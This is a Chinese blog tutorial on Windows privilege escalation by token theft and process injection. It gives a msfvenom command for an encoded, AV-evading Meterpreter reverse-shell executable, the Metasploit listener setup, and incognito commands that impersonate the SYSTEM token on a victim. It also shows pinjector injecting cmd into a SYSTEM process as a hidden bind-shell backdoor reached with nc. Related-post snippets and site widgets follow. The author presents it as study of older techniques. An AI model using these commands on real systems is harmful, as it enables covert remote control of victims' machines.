提权 - Windows 令牌窃取/进程注入提权

最新推荐文章于 2024-05-02 19:40:00 发布
最新推荐文章于 2024-05-02 19:40:00 发布
阅读量458 收藏 3
点赞数 1
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/acepanhuan/article/details/129273229
版权

提权 - Windows 令牌窃取/进程注入提权

Windows 令牌窃取提权

这种提权方式属于本地提权
  一个进程的是由某个用户执行的,可以窃取该用户的令牌进行远程过程调用时请求提升权限,然后调用它从而生成特权安全令牌以执行特权操作。当系统允许令牌不仅用于进程本身,还用于原始请求进程时,漏洞就会出现。

适用版本如下:
在这里插入图片描述
提权流程:获取会话 —> 利用模块 —> 窃取令牌 —> 提权

  1. 在攻击机上面使用MSF生成一个反弹shell.
    msfvenom -p windows/meterpreter_reverse_tcp LHOST={监控IP} LPORT={监控端口} -e x86/shikata_ga_nai -f exe -o new.exe -i 5
    参数解读:
    -p 指定需要使用的payload(攻击荷载)。
    -f 指定输出格式
    -e 指定需要使用的encoder(编码器)编码免杀。
    -i 指定payload的编码次数
    在这里插入图片描述

2.在攻击者 msf 服务器上执行以下命令,监听端口

msfconsole

use exploit/multi/handler
set payload  windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
run

在这里插入图片描述
3.将生成好的木马文件放到受害主机上执行。
在这里插入图片描述
执行之后可以看到攻击机上MSF已经接收到反弹回话了。
4.执行命令
use incognito / 进入incognito
list_tokens -u / 列出令牌
impersonate_token “NT AUTHORITY\SYSTEM” / 令牌假冒 SYSTEM

在这里插入图片描述

Windows 进程注入提权

  进程注入提权是本地提权方式的一种较为老的安全技术了,利用的是注入进程的所有者实现权限共享机制,这类技术主要利用在Windows2008之前的操作系统上.
pinjector工具下载:https://www.tarasco.org/security/Process_Injector/index.html
1.上传pinjector.exe到靶机可执行目录,运行以下命令,查看当前进程,以及进程权限;

pinjector.exe -l   获取当前电脑运行进程列表 以及对应的权限。

在这里插入图片描述
2.指定某个进程的pid(含有system权限),然后将cmd注入到其中,同时开启侦听端口。

pinjector.exe -p 420 cmd 6688

3.使用nc去连接目标服务器的6688端口,获取system权限的shell。
在这里插入图片描述
  使用 pinjector.exe 注入到system用户的进程中,使该进程绑定在0.0.0.0:port ,并建立监听端口,攻击者从攻击机上主动连接该地址,获取到系统的system权限。注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难被发现,但是这种只支持老版本的Windows系统,学习了解一下以前的技术,万一哪天碰到了呢。

acepanhuan
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第61天:权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
#数据库应用提权在权限提升中的意义#WEB 或本地环境如何探针数据库应用#数据库提权权限用户密码收集等方法#目前数据库提权对应的技术及方法等演示案例:Redis
简单使用系统System(超级管理员)权限运行进程-提权
不蚌埠!
08-12 5106
通过令牌窃取winlogon和lsass来启动进程获得超级管理员权限!
使用MSF进行提权windows提权、linux提权、wesng使用
liuhyusb的博客
03-12 505
​​MSF Windows提权​​​​反弹shell​​​​提权​​​​END推荐阅读​​​​MSF Linux提权​​​​反弹shell​​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
【内网安全】——Windows提权姿势
Demo不是emo的博客
02-06 5071
超详细的windows提权姿势汇总
Windows令牌窃取提权和烂土豆提权学习
Goodric的博客
07-24 1596
令牌,又叫token,是系统临时产生的秘钥,相当于账号密码,用来决定是否允许此次请求和判断此次请求是属于哪一个用户。令牌无需提供密码或其他凭证,就可以访问网络和系统资源,这些令牌持续于系统中,除非系统重新启动。令牌的最大特点就是随机性,不可预测,无法猜解。当不同的用户登录计算机后,都会生成一个访问令牌,这个Token在用户创建进程或线程时还会被使用,并不断进行拷贝,一般用户双击运行⼀个进程都会拷贝explorer.exe中的AccessToken令牌的分类。...
使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
热门推荐
D-river博客
10-11 4万+
强大的metasploit平台加入了永恒之蓝漏洞的利用exploit,可以对ms17-010漏洞进行利用,支持对windows7和windows 2008 R2。
[内网渗透]—令牌窃取
Sentiment的博客
12-27 2222
令牌(Token)是指系统中的临时秘钥,相当于账户和密码,有了令牌就可以在不知道密码的情况下访问目标相关资源了,这些令牌将持续存在于系统中,除非系统重新启动。
进程注入进程提权
WgpSec狼组安全团队
06-04 1087
本文作者:Gality 本文字数:7928字 阅读时长:20分钟 本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。 狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 最近在研究进程注入相关的东西,主要是参考process-
第一章 提权基础
density__的博客
09-26 338
提权是整个黑客攻防过程中最难的一个环节。对于渗透来说,获取的权限越高,控制的服务器权限越多。在整个渗透流程中,提权过程汇聚了思路,技巧,工具和技术。本章主要介绍各种提权的基础知识,主要包括如何提权,如何破解Windows及LInux的密码,一些后门工具的使用,对提权工具的免杀处理,以及端口转发和代理工具的使用 本章主要内容: 提权概述 Windows账户和密码的获取与破解 使用John the Ripper破解LINUX密码 Linux提权辅助工具Linux ...
windows提权之at&sc&ps&进程注入&令牌窃取
m0_62207170的博客
03-20 712
windows提权之at&sc&ps&进程注入&令牌窃取
提权技术之给任意进程提权(我们以OD,CE为例)
a756598009的博客
06-22 668
赋予进程某种特殊权限 也叫提升读写权限 那么为什么要提升读写的权限呢 如果我们想修改游戏内存数据 数字的话正常情况下我们无法进行跨进程内存读写 这时候就可以使用 提升自身辅助进程的权限 来达到能读写游戏内存的效果那提权的原理又是什么呢?游戏虽然做了自身的进程保护 不允许其他进程读写 但是我们电脑系统本身就是有系统自带的进程winlogon.exe 这进程为例,这个进程是可以随意读写游戏内存的 游戏的保护也会过滤掉系统进程对自身的读写,
windows下的 Nsudo提权工具,支持system权限
02-05
类似Linux下的 sudo 命令的一款windows下工具,支持任意权限提权令牌,包括system账户,附带命令行工具和源代码
bpmn-js-token-simulation:用于令牌模拟的bpmn-js扩展
05-11
bpmn-js令牌模拟 用于令牌模拟的bpmn-js扩展。 安装 通过安装。 npm install bpmn-js-token-simulation 作为附加模块添加到 。 造型师 var BpmnModeler = require ( 'bpmn-js/lib/Modeler' ) ; var ...
窃取AccessToken的方法:incognito.exe程序
07-28
令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。...窃取AccessToken的方法: incognito.exe程序 、InvokeTokenManipulat.ps1脚本 、MSF里的incognito模块
获取Mi Home设备令牌Windows / MacOS应用。-JavaScript开发
05-26
获取Mi Home设备令牌Windows / MacOS应用程序获取Mi Home设备令牌应用程序下载版本安装依赖项npm i获取Mi Home设备令牌Windows / Mac OS应用程序。 在开发人员模式下运行npm start在项目主管中创建了电子文件夹,并...
网络安全风险里的威胁建模
最新发布
qq_41432686的博客
05-02 561
网络安全的本质是攻防双方的对抗与博弈。然而,由于多种攻防之间的不对称性因素存在,使得攻击者总能在对抗过程中抢占先机。为了更好地了解潜在的威胁和缺陷,实现主动式防御,企业需要重新考虑他们的网络防护方法,而威胁建模(Threat modeling)正是网络安全武器库中关键防御武器。
网络安全之密码学技术
缘友一世的博客
04-29 1092
在DES算法中,明文按64位进行分组(块),密钥长度也是64位,(事实上只有56位参与DES运算,第8、16、24、32、40、48、56、64位是校验位, 使DES的每个密钥都有奇数个1),分组后的每64位明文组(块)分别与56位密钥进行多轮置换(按位替代/交换),最后生成64位的密文组(块)。RSA密钥是(公钥+模值)、(私钥+模值)成组分发的,单独一个公钥或私钥是没有用处,所以所谓的“密钥”其实是它们两者中的一个。IDEA是作为迭代的分组密码实现的,使用128位的密钥和8个循环。
网络安全思考题
weixin_62304542的博客
04-27 945
网络安全渗透思考题
网络安全(黑客)—2024自学
dexi1113的博客
04-16 1846
我在这里可以很肯定地告诉你:"网络安全有很好的发展前景,前沿网络安全技术即将崛起,或者说已经崛起"。
[request:server]: Invalid token. at handleError (webpack-internal:///./node_modules/webpack-dev-server/client/overlay.js:299:58) at eval (webpack-internal:///./node_modules/webpack-dev-server/client/overlay.js:322:7)
07-11
这个错误信息提示了一个无效的令牌(Invalid token)的请求。根据错误提示,这可能与webpack-dev-server的客户端覆盖(overlay)功能相关。 在webpack-dev-server的配置中,overlay功能用于在浏览器中显示编译错误...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值